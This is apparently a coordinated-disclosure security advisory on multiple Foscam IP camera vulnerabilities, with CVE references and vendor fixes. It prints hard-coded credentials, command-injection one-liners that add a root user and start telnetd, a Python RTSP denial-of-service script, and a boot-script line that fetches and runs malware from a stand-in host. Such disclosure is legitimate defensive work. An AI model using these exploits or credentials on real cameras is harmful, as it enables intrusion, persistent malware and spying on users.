Foscam IP Camera Multiple Vulnerabilities ========================================= The latest version of this advisory is available at: https://sintonen.fi/advisories/foscam-ip-camera-multiple-vulnerabilities.txt Overview -------- Foscam IP Cameras have multiple vulnerabilities that lead to full device compromise. Description ----------- There are number of critical security vulnerabilities in the Foscam IP Cameras. Here is a brief summary of some of the issues covered by this advisory: - unauthenticated remote command execution as root - authenticated remote command execution as root (x2) - unauthenticated denial of service of the RTSP video feed - unauthenticated administrative credential disclosure - unauthenticated stack-based buffer overflow - unauthenticated remote telnetd switch (turn telnetd on/off) - unauthenticated persistent cross-site scripting - hidden factory credentials - the device "IP firewall" doesn't actually firewall much Impact ------ Unauthenticated attacker can persistently compromise the Foscam IP Cameras by employing a number of different methods leading to full loss of confidentiality, integrity and availability, depending on the actions of the attacker. The compromised device can be used for further actions such as DDoS, or other malicious activity. If the device is in a corporate local area network, and the attacker gains access to the network, they can compromise the device and infect it with a persistent remote access malware. The malware would then allow the attackers unfettered access to the corporate network and the associated resources. Details ------- There are multiple vulnerabilities in the Foscam cameras. Not all of them are present in all models, however. 1. Insecure Default Credentials: admin (CWE-255) [CVE-2018-19063] The devices use non-random default credentials of: admin:(blank). A remote network attacker can gain privileged access to a vulnerable device if these credentials have not been changed. It is also possible to upload and download files with the built-in FTP server (port 50021) and to watch the RTSP video feed. 2. Insecure Default Credentials: ftpuser1 (CWE-255) [CVE-2018-19064] The built-in FTP user (ftpuser1) has an empty password. 3. Use of Hard-coded Credentials: ftpuser1 (CWE-798) [CVE-2018-19064] The built-in FTP user password cannot be changed by any normal means. Even if successful in log in, the user itself cannot change the password. 4. Use of Hard-coded Credentials: Configuration back-up file (CWE-798) [CVE-2018-19065, CVE-2018-19066] The Foscam device configuration can be exported from the device. The exported file is a openssl encrypted tar.gz archive. The password used is BpP+2R9*Q (or for older models: Pxift*). To extract the configuration file, use the following command: $ openssl enc -d -aes-128-cbc -k 'BpP+2R9*Q' < configs.bin | tar zxv 5. Use of Hard-coded Credentials: factory~ (CWE-798) [CVE-2018-19067] All Foscam models have hidden and hard-coded credentials that allow access to the device regardless of the currently configured users. The username factory~ and password Ak47@99 enable access to some of the device web user interface functionalities. The functionalities allowed vary depending on the model of the device. Some models allow controlling the telnetd service and restoring the device to factory settings. These models include at least `Opticam i5'. 6. Hidden Functionality: telnetd Switch (CWE-912) [CVE-2018-19068] The authenticated administrative user can control the telnetd service by sending the following HTTP requests: Enable: http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=root&pwd=toor&cmd=setTelnetSwitch&switch=1 Disable: http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=root&pwd=toor&cmd=setTelnetSwitch&switch=0 With some models (at least `Opticam i5') this HTTP request also works with the hidden factory credentials. 7. Remote Command Injection in User Add (CWE-77) [CVE-2018-19070] The usrName parameter in the CGIProxy.fcgi addAccount functionality ends up in a command line executed by the shell. Since the web interface is running as root, the command is executed as root as well. Valid administrative credentials are needed for exploiting. If the default admin credentials have not been changed the following proof of concept creates a file to root directory: $ curl 'http://:88/cgi-bin/CGIProxy.fcgi?usr=admin&pwd=&cmd=addAccount&usrName=`touch+/pwned`&usrPwd=foobar&privilege=2' # ls -l /pwned -rw-r--r-- 1 root root 0 May 5 05:12 /pwned 8. Incorrect Permission Assignment for Critical Resource: /mnt/mtd/boot.sh (CWE-732) [CVE-2018-19071] At system start-up the device will execute various start-up scripts. The chain of execution at boot time is: /sbin/init -> /etc/inittab -> /etc/init.d/rcS -> /etc/init.d/S90init -> /mnt/mtd/boot.sh The script /mnt/mtd/boot.sh is world writable, enabling any user to modify it. The file is stored on a flash storage, so any changes to it will be carried over a system reboot. File permissions: -rwxrwxrwx 1 root root 7547 May 4 21:50 boot.sh 9. Incorrect Permission Assignment for Critical Resource: /mnt/mtd/app (CWE-732) [CVE-2018-19072] The directory containing persistent version of the software being run by the Foscam device is world writable: drwxrwxrwx 9 root root 0 Jan 1 1970 app The directory itself contains software archives that are extracted to RAM at boot time: -rw-r--r-- 1 root root 597164 Nov 21 2014 www.tar.xz -rw-r--r-- 1 root root 2472788 Nov 21 2014 zbin.tar.xz -rw-r--r-- 1 root root 519320 Nov 21 2014 zlib.tar.xz -rw-r--r-- 1 root root 1247616 Aug 5 2014 zmodules.tar.xz Due to the insecure permissions, any local user can replace the archives to gain root privileges. 10. Remote Command injection in /mnt/mtd/boot.sh via ProductConfig.xml (CWE-77) [CVE-2018-19073] /mnt/mtd/boot.sh has a persistent command injection vulnerability: eval $(cat $product_config_path | grep 'modelName' | awk -F ">" '{print $2}' | awk -F "<" '{printf("MODELNAME=\"%s\"",$1);}') The vulnerability can be exploited by using shell meta characters in the modelName in the /mnt/mtd/app/config/ProductConfig.xml file. The crafted ProductConfig.xml file can be installed to the device by using the configuration restore functionality. Valid administrative credentials are needed to exploit this vulnerability. 11. Improper Access Control: Firewall (CWE-284) [CVE-2018-19074, CVE-2018-19075] The Foscam cameras feature a firewall that is supposed to restrict access to the device. However, it in fact only protects access to the web user interface (ports 88 and 443). The IP addresses that are firewalled are still able to access other services, such as ONVIF (888), FTP (50021), RTSP (65534) and telnet (23). It is possible to access RTSP at port 88 too, even though the web log in doesn't work. The firewall is implemented in a way that it discloses information about credential validity. Invalid credentials lead to error -2, while correct credentials behind a firewalled IP address result in error -8. [CVE-2018-19075] 12. Missing Restriction of Excessive Authentication Attempts (CWE-307) [CVE-2018-19076] The Foscam cameras do not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame. It is possible to perform brute force attacks against the login credentials. The problem applies to at least the FTP server (port 50021) and RTSP (port 65534). The web user interface has a protection against a brute force attack. 13. Denial of service of the RTSP video feed (CWE-400) [CVE-2018-19077] The Foscam camera RTSP service (RtspServer) has an implementation flaw when processing the `Content-Length' header. Negative numbers are processed incorrectly and lead to either RtspServer crash due to out of bound memory read or to a busy loop where the single request is processed forever in a tight loop. Since there is a watchdog service that restart a crashed service, from attacker point of view the hang is preferable. When executed, the attack disconnects or freezes the current video feed and no new connections can be made. The only way for user to recover the video feed is to reboot the device. Proof of concept attack: #!/usr/bin/env python import socket, sys s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],65534)) s.sendall('''GET_PARAMETER a RTSP/1.0\r Content-Length: -44\r CSeq: 1\r \r ''') s.close() NOTE: This vulnerability doesn't appear to exist in some camera models or firmware versions. However, it affects at least `Opticam i5'. 14. Administrator Credential Disclosure via Anonymous ONVIF GetStreamUri (CWE-862) [CVE-2018-19078] The Foscam camera ONVIF implementation allows anonymous access. Unauthenticated attacker is able to extract the administrator user name and password via `media' `GetStreamUri' method. ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl media GetStreamUri "{'ProfileToken': 'prof0'}" True: {'InvalidAfterReboot': False, 'Timeout': PT0S, 'Uri': rtsp://root:toor@HOST:88/videoMain, 'InvalidAfterConnect': False} NOTE: This vulnerability doesn't appear to exist in some camera models or firmware versions. However, it affects at least `Opticam i5'. 15. Unauthenticated Reboot via Anonymous ONVIF SystemReboot (CWE-862) [CVE-2018-19079] The Foscam camera ONVIF implementation allows anonymous access. Unauthenticated attacker is able to reboot the device by using the `devicemgmt' `SystemReboot' method. NOTE: Anonymous access only appear to be possible with some camera models and/or firmware versions. Anonymous access appears to work with at least `Opticam i5'. 16. Unauthenticated Persistent XSS via Anonymous ONVIF SetHostname (CWE-79) [CVE-2018-19080] The Foscam camera ONVIF implementation allows anonymous access. Unauthenticated attacker is able to trigger a persistent Cross-Site Scripting attack against the web user interface users. ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetHostname "{'Name': ''}" The XSS payload will trigger when the `Status' / `Device Information' page is displayed. NOTE: Anonymous access only appear to be possible with some camera models and/or firmware versions. Anonymous access appears to work with at least `Opticam i5'. 17. Unauthenticated Remote Command Injection via Anonymous ONVIF SetDNS (CWE-77) [CVE-2018-19081] The Foscam camera ONVIF implementation allows anonymous access. Unauthenticated attacker is able to trigger a remote command execution as root via `devicemgmt' `SetDNS' method. ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS '{"FromDHCP": False, "DNSManual": {"Type":"IPv4", "IPv4Address":"`id>/pwned`"}}' # ls -l /pwned -rw-r--r-- 1 root root 24 Dec 4 06:55 /pwned Note that due to some processing of the parameters space characters are removed from the IPV4Address parameter value. They can be replaced with tabs (\t). A proper exploit would use GetDNS to obtain the original configuration and restore it with another SetDNS afterwards. NOTE: Anonymous access only appear to be possible with some camera models and/or firmware versions. Anonymous access appears to work with at least `Opticam i5'. 18. Stack-based Buffer Overflow in ONVIF SetDNS (CWE-121) [CVE-2018-19082] The Foscam camera ONVIF implementation allows anonymous access. Unauthenticated attacker is able to trigger a remote stack-based buffer overflow via `devicemgmt' `SetDNS' method. ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS "{'FromDHCP': False, 'DNSManual': {'Type':'IPv4', 'IPv4Address':\"`perl -e 'print "A"x128'`\"}}" Core was generated by `NVTService'. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x41414140 in ?? () [Current thread is 1 (LWP 1305)] (gdb) bt #0 0x41414140 in ?? () #1 0x400b3f84 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i r r0 0x0 0 r1 0x0 0 r2 0x2461e4f 38149711 r3 0x0 0 r4 0x41414141 1094795585 r5 0x41414141 1094795585 r6 0x41414141 1094795585 r7 0x41414141 1094795585 r8 0x41414141 1094795585 r9 0x2431ca0 37952672 r10 0x41166d6c 1091988844 r11 0x41166d68 1091988840 r12 0x400ec254 1074709076 sp 0x41166d40 0x41166d40 lr 0x400b3f84 1074478980 pc 0x41414140 0x41414140 cpsr 0x60000030 1610612784 (gdb) NOTE: It is likely there are number of similar crashes in the firmware. NOTE: Anonymous access only appear to be possible with some camera models and/or firmware versions. Anonymous access appears to work with at least `Opticam i5'. Practical Proof-of-Concept Attacks ---------------------------------- 1. As unauthenticated user 1.1. Add new root user to /etc/passwd, enable telnetd, log in as root $ ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS '{"FromDHCP": False, "DNSManual": {"Type":"IPv4", "IPv4Address":"`echo\tpwn::0:0::/root:/bin/sh>>/etc/passwd;telnetd`"}}' True: {} $ telnet HOST Trying HOST... Connected to HOST. Escape character is '^]'. (none) login: pwn You are welcomed by Foscam R&D. None of nfsroot found in cmdline. # id uid=0(root) gid=0(root) groups=0(root) # 1.2. Enable telnetd remotely, log in as ftpuser1, install persistent payload $ curl 'http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=factory~&pwd=Ak47@99&cmd=setTelnetSwitch&switch=1' 0 $ telnet HOST Trying HOST... Connected to HOST. Escape character is '^]'. (none) login: ftpuser1 Password: sh: using fallback suid method You are welcomed by Foscam R&D. $ echo '(sleep 60;wget http://evil.invalid/malware.sh -O-|sh)&' >>/mnt/mtd/boot.sh The attacker can now reboot the device by utilizing the anonymous ONVIF `devicemgmt' `SystemReboot' method. This ensures that the payload gets downloaded and installed: ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SystemReboot Another option is to cause a local denial of service situation. The device watchdog process will then reboot the camera. This can be achieved for example with: # echo -e 'for i in `seq 1 500`;do yes|md5sum&\ndone'|sh -i 2. Authenticated user / not yet configured device 2.1. Add new root user to the system, enable telnetd, log in as root $ curl 'http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=admin&pwd=&cmd=addAccount&usrName=`echo+pwn::0:0::/root:/bin/sh+%3E%3E/etc/passwd;telnetd`&usrPwd=pwned&privilege=2' 0 $ telnet HOST Trying HOST... Connected to HOST. Escape character is '^]'. (none) login: pwn You are welcomed by Foscam R&D. None of nfsroot found in cmdline. # id uid=0(root) gid=0(root) groups=0(root) # If the device administrator user name and password have been configured the `usr' and `pwd' parameters must reflect those values. Vulnerable Devices ------------------ Foscam manufactures number of IP cameras that are being sold as white-labelled under various brand names. See http://www.Foscam.com/products/IP_Camera.html The vulnerability has been confirmed with OptiCam i5 HD device (while it is not listed as an official Foscam product it seems to be manufactured by them). Some vulnerabilities were confirmed to exist in `Foscam C2', too. The following devices are known to be vulnerable: Model Name System Firmware Version Application Firmware Version Opticam i5 1.5.2.11 2.21.1.128 Foscam C2 1.11.1.8 2.72.1.32 Likely vulnerable devices can be found from the internet with: https://www.shodan.io/search?query=port%3A88+title%3A%22IPCam+Client%22 End User Mitigation ------------------- - Only use the cameras in a dedicated network or VLAN Recommendations to Vendor ------------------------- - Make existing fixes available for all models in a coordinated way. - Always quote input that ends up commands executed by the shell, or use exec() family functions exclusively. Avoid system() calls. Avoid construct where execl is called with "sh -c %s" since this is same as a system() call. - Avoid eval in shell scripts on untrusted input. - Remove unsafe input processing (sprintf, strcpy, strcat, memcpy with untrusted length etc). - Employ a truly random default administrative password and add a sticker at the bottom of the device with the password. - If some user doesn't need to log on directly ever, use ! as hash in passwd file. - Remove unnecessary hidden functionality such as being able to enable telnetd. - Remove factory built-in credentials. - Implement proper iptables firewall. - Fix world writable file/directory permissions. - Always perform proper encoding of HTML special characters. - Disallow anonymous ONVIF. Credits ------- These vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation. Timeline -------- 2016.11.30 discovered the RCE vulnerability in user add. 2016.11.30 wrote a preliminary advisory 2016.11.30 contacted Verkkokauppa.com and CERT-FI. 2016.12.03 found more vulnerabilities. 2016.12.04 found 2 more RCEs and ONVIF related issues. 2016.12.05 sent preliminary advisory to CERT-FI for coordination. 2017.06.21 adjusted the finding 12 description. 2018.11.01 full disclosure of the vulnerability details. 2018.11.08 added CVE IDs.